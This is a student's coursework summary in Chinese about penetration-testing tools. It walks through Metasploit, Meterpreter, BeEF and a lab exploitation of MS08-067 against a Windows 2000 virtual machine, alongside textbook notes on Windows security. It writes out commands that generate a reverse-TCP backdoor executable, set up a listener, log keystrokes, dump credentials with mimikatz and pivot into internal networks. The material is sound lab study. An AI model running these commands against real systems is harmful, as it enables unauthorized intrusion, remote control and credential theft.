2017-2018-2 20179205 《網絡攻防技術與實踐》第七週做業

《網絡攻防技術與實踐》第七週學習總結

視頻學習總結

1、漏洞利用之檢索與利用

漏洞利用工具集javascript

1.Exploit Database->searchsploit

2.pattern create

測試漏洞

armitage

結合MSF進行利用html

3.jboss-autopwn-linux->win

專門針對Jboss的漏洞利用工具java

4.ikat

自動化開啓,等待目標訪問中招。linux

5.termineter

評估智能電錶的安全性。算法

2、漏洞利用之Metasploit基礎

Metasploit在滲透測試中常常被用到,實際上這套軟件包括了不少工具,這些工具組成了一個完整的攻擊框架。他們或許在滲透測試中的每一方面都不能成爲最好用的工具,但組合起來的框架卻讓它變得很強大。sql

1.啓動服務

Kali漏洞工具集中的重要組成工具,須要先開啓兩個PostgreSQL數據庫服務和metasploit服務,而後就能夠完整的利用msf數據庫查詢exploit和記錄。
shell

service postgresql start 
service metasploit start

啓動時發現顯示錯誤,上網查找緣由發現是這個版本已經沒有metasploit服務了:數據庫

須要利用如下方法打開帶數據庫支持的MSF服務:windows

etc/init.d/postgresql start 或者 service postgresql start  //啓動postgresql數據庫
msfdb init //初始化MSF數據庫
msfconsole
db_status  //在msf中能夠查看數據庫鏈接狀態

若是不想每次開機都手工啓動服務,配置隨系統啓動api

update-rc.d postgresql enable
update-rc.d metasploit enable

2.路徑介紹

msf的路徑cd /usr/share/metasploit-framework/
msfencode -l 未找到命令

Auxiliary: 輔助模塊

encoders: 供msfencode編碼工具使用,具體可使用msfencode -1

exploits:攻擊模塊,每一個介紹msf的文章都會提到那個ms08_067_netapi,它就是這個目錄。

payloads:這裏面列出的是攻擊載荷,也就是攻擊成功後執行的代碼。好比咱們常設置的windows/meterpreter/reverse_tcp就在這個文件夾下。

post:後滲透階段模塊,在得到meterpreter的shell以後可使用的攻擊代碼。好比經常使用的hashdump、arp_scanner就在這裏。

3.基本命令

msfpayload:用來生成payload或者shellcode
搜索時候能夠用msfpayload -l |grep 「windows」這樣的命令來查詢
-o選項能夠列出payload所需的參數
msfencode:msf中的編碼器,早期爲了編碼繞過AV如今經常使用msfpayload與它編碼避免exploit的壞字符串。使用它做爲攻擊載荷可以得到目標系統的一個meterpretershell的連接。
msfconsole:
開啓metasploit的console

4.測試示例:發現漏洞,搜索exploit

以SSH用戶名枚舉攻擊對metasploit工具進行測試,利用winxpserver靶機,IP地址爲192.168.92.148,而後經過nmap對靶機所開放的端口服務版本進行探測:

掃描得知,目標21端口vsftpd版本爲5.0,使用msfconsole打開的msf中使用命令search vsftpd,查看是否存在相應的漏洞利用exploit:

5.測試示例:選擇exploit,查看參數。

選擇上圖標記出的工具,進行ssh用戶名枚舉,接着利用命令 use使用該工具,選擇exploit,查看參數:

6.測試示例:選擇payload

Required顯示yes,表示須要被設置,設置好遠程IP地址:

7.測試示例:設置參數

使用set命令設置參數,說明已經參數已經被設置好。

8.測試示例:執行攻擊測試

輸入exploit便可進行攻擊測試,若是成功,將返回一個shell,出現綠色的UID,說明攻擊比較成功。這時能夠查看靶機的IP,cat到一些信息。

3、漏洞檢測之Meterpreter

  Meterpreter是Metasploit框架中的一個拓展模塊,做爲溢出成功後的攻擊載荷使用。攻擊載荷在溢出攻擊成功之後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個Meterpretershell的連接。

  Meterpreter做爲後滲透模塊有不少類型,而且命令由核心命令和擴展庫命令組成,極大的豐富了攻擊方式。其有不少的功能,如添加一個用戶、隱藏一些東西、打開shell、獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等。

經常使用的命令:

background 將當前會話放置後臺

load/use 加載模塊

interact 切換進一個信道

migrate 遷移進程

run 執行一個已有的模塊

Resource 執行一個已有的rc腳本經常使用的meterpreter類型:

payload windows/meterpreter/reverse_tcp

1.生成meterpreter後門:

使用命令:msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.150 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe

發現設置成功後仍沒法顯示,由於新版本的kali下msfpayload已經被移除了。之後只要使用msfvenom就好了,它集成了msfpayload和msfencode的功能:

因此生成meterpreter後門的命令等同爲:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.92.150 LPORT=2333 -i 5 -f exe /root/door.exe

生成成功,將其移入XP系統中:

2.打開MSF,開啓監聽

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LPORT 2333

修改監聽端口:

3.在目標主機上執行door.exe

在kali的msf中執行exploit開始監聽:

4.經過help命令查看可執行命令:

5.常見命令使用

6.捕獲屏幕,能夠看到捕獲結果保存在root下

7.鍵盤監聽

開啓服務:keyscan_dump
關閉服務:keyscan_stop

8.擴展工具:load

9.擴展工具之load mimikatz

抓取本地密碼明文:

發現多了一個mimikatz command:

獲取憑據,輸入命令:wdigest

4、漏洞檢測之Metasploit後滲透測試

  在跳板機獲取必定權限後,須要積極的向內網主機權限發展,獲取制定的目標信息,探查系統的漏洞,藉助系統的漏洞,藉助Msf已經獲得的meterpreter後門,可使系列的操做更容易。

1.查看跳板機的網卡

ifconfig

2.添加路由表

run autoroute -s 10.0.0.1

這是在Metasploit最經常使用的方法,在添加路由表和session的關係後,即可以使用msf中的模塊跨網段掃描或攻擊。

3.開socks代理

經過使用auxiliary/server/socks4a模塊,建立一個socks代理,能夠爲瀏覽器,Sqlmap,Nmap等使用。

background 把session置於後臺
search socks  使用socks開代理
use auxiliary/server/socks4a
showoptions
exploit

4.經過background和sessions -i能夠自由切換進入session

5.輸入run能夠看到在meterpreter上能夠作的不少命令

6.經過run post/能夠看到後滲透測試的模塊

7.掃描內網信息

run arp_scanner -r 目標IP地址<br>
內網端口轉發<br>
upload lcx.exe c:\ 上傳到C盤根目錄<br>

8.也能夠上傳文件,作端口轉發後進行後續測試

5、漏洞檢測之BeeF

對XSS漏洞的利用須要一個強大的框架支持,BeeF是瀏覽器攻擊框架的簡稱,是一款專一於瀏覽器端的滲透工具。

1.命令行下啓動BeeF

直接使用命令 beef-xss便可,打開瀏覽器,會自動跳轉至beef登陸頁面:

默認用戶名:beef
密碼:beef

便可進入主界面:

2.假設被測試主機因爲XSS漏洞請求到

測試利用:輸入網址http://127.0.0.1:3000/demos/basic.html,能夠進入一個測試頁面:

這樣在主界面左端就能夠看到一個在線主機:

3.HOOK持續的時間爲關閉測試頁面爲止,在此期間至關於被控制了,能夠發送攻擊命令,在Commands模塊咱們能夠完成不少任務。

其中。4中顏色分別表示:

該攻擊模塊可用,且隱蔽性強

該攻擊模塊可用,但隱蔽性差

該用戶模塊是否可用還有待驗證

該攻擊模塊不可用

4.選取MISC下的Raw JavaScript模塊爲測試用例

有段表格有該模塊的詳細說明,以及一些可選的參數等。隨意輸入good morning,點擊Excute進行攻擊:

執行後在目標網頁能夠看到以下效果圖:

5.Proxy功能

選中目標主機,點右鍵,在菜單中選中use as proxy,而後在rider選項卡中的forge request 編輯併發送想要發送的內容:

信息發送後,可經過History選項看到,待傳輸成功後,點擊相應的信息,便可顯示詳細的傳輸過程:

6.BeeF與Metasploit結合加載

BeeF默認是不加載Metasploit的,若是要使用Metasploit豐富的攻擊模塊,須要作些配置:

修改文件config.yaml

打開一個msfconsole

能夠看到Metasploit下面多了不少可使用的模塊。

修改 /usr/share/beef-xss/config.yaml中的Metasploit一行爲true:

保證此處IP等信息設置正確,並修改custom路徑:

配置好後,打開msfconsole,運行命令:

load msgrpc ServerHost=192.168.92.150 Pass=abc123

輸入路徑cd /usr/share/beef-xss/
,執行./beef -x命令

重啓beef發現已經加載了不少Metasploit的攻擊模塊:

教材第七章 Windows操做系統安全攻防 學習總結

1、Windows操做系統基本框架

一、windows基本結構分爲運行於處理器特權模式的操做系統內核以及運行在處理器非特權模式的用戶,即爲內核態和用戶態。

二、核心機制:進程和線程管理機制、內存管理機制、文件管理機制、註冊表管理機制、網絡管理機制。

三、網絡管理機制:網卡硬件驅動程序(物理層)、NDIS庫以及miniport驅動程序(鏈路層)、TDI傳輸層(網絡協議驅動)(網絡層和傳輸層)、網絡APID以及TDI客戶端(會話層和表示層)、網絡應用程序和服務進程(應用層).

2、Windows操做系統的安全體系結構和機制

一、監控器模型:主體到客體的訪問都經過監控器做中間,由引用監控器根據安全訪問控制策略來進行受權訪問,全部訪問記錄都由監控器生成審計日誌。

二、核心:SRM安全引用監控(內核中)、LSASS安全服務(用戶態)、winlogon/netlogn、以及Eventlog

三、身份認證機制:安全主體:用戶、用戶組、計算機 身份認證:本地身份認證(winlogon進程、GINA圖形化登陸窗口與LSASS服務)、網絡身份認證(NTLM、Lanman、kerberos)

四、受權與訪問控制機制:對象:文件,目錄,註冊表鍵值,內核對象,同步對象,私有對象,管道,內存,通訊接口。 屬性組成:Owner SID,Group SID,DACL自主訪問控制列表,SACL系統審計訪問控制列表。

五、安全審計機制

六、其餘安全機制:安全中心(防火牆、補丁自動更新、病毒防禦),IPsec加載和驗證機制,EPS加密文件系統,windows文件保護機制,捆綁的IE瀏覽器所提供的隱私保護和瀏覽器安全保護機制。

3、Windows遠程安全攻防技術

一、包括遠程口令猜解攻擊、windows網絡服務攻擊,windows客戶端和用戶攻擊。

二、遠程口令猜解攻擊: 遠程口令猜解:SMB協議(tcp44五、tcp139),其餘包括WMI服務、TS遠程桌面終端服務,MY SQL數據庫服務、SharePoint。

3遠程口令猜解的防範:關閉沒必要要的易受攻擊的網絡服務、配置主機防火牆來限制某些端口服務、網絡防火牆限制這些服務的訪問、禁用過期且有安全缺陷的Lanman和NTLM、指定強口令策略。

四、網絡服務遠程滲透攻擊:針對NETBIOS服務的著名漏洞和攻擊、針對SMB服務的著名漏洞和攻擊、針對MSRPC服務的著名漏洞和攻擊、針對windows系統上微軟網絡的遠程滲透攻擊、針對windows系統上第三方服務的遠程滲透攻擊。
5.網絡服務遠程滲透防範措施:最基本的是儘可能避免與消除這些滲透攻擊所依賴的服務軟件安全漏洞。

4、Windows本地安全攻防技術

一、本地提權攻擊:利用操做系統內核、特權用戶啓動程序中安全缺陷與漏洞,緣由是服務器和桌面系統沒有即時進行補丁更新。

二、敏感信息竊取: windows系統口令密文提取技術(拷貝口令密文文件、rdisk工具有份、pwdumpx從SAM文件或者活動目錄中提取口令密文) windows系統口令字破解技術、用戶敏感數據竊取:find、findstr、grep、meterpreter

3.本地敏感信息竊取防範:選擇高強度、高防護的口令,使用更安全的加密明文算法,安全配置策略。

5、Windows攻擊實驗

實驗描述:

使用Metaspoit攻擊MS08-067,提交正確獲得遠程shell過程的截圖(很多於五張)。

MS08-067漏洞介紹

  MS08-067漏洞的全稱爲「Windows Server服務RPC請求緩衝區溢出漏洞」,若是用戶在受影響的系統上收到特製的 RPC 請求,則該漏洞可能容許遠程執行代碼。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證便可利用此漏洞運行任意代碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

實驗工具

本次實驗使用的攻擊機是kali,靶機是Win2kServer

攻擊機:192.168.92.147
靶機:192.168.92.148

實驗步驟:

1.首先攻擊機和靶機互ping,在kali終端開啓msfconsole

2.查找是否存在ms08_067漏洞,查看返回信息,會顯示出找到的滲透模塊

3.輸入命令use exploit/windows/smb/ms08_067_netapi,進入利用該漏洞模塊。接下來可輸入一些命令來顯示一些信息,如:

輸入show payloads會顯示出有效的攻擊載荷,好比shell_reverse_tcp

使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷

輸入show targets會顯示出能夠被攻擊的靶機的操做系統型號

4.輸入show options顯示咱們須要在攻擊前須要設置的數據

5.設置攻擊機和靶機地址,並使用命令show options再次查看payload狀態

輸入命令set LHOST + 攻擊機IP,即set LHOST 192.168.92.147;
輸入命令set RHOST + 靶機IP,即set RHOST 192.168.92.148;

6.輸入命令exploit開始攻擊,下圖爲正常攻擊成功結果

7.在攻擊機和靶機中分別查看IP地址,輸入ipconfig/all,發現結果一致

8.輸入「netstat -a」命令,能夠查看靶機開啓了哪些端口

9.輸入「netstat -n」命令, 查看靶機端口的網絡鏈接狀況

相關文章
相關標籤/搜索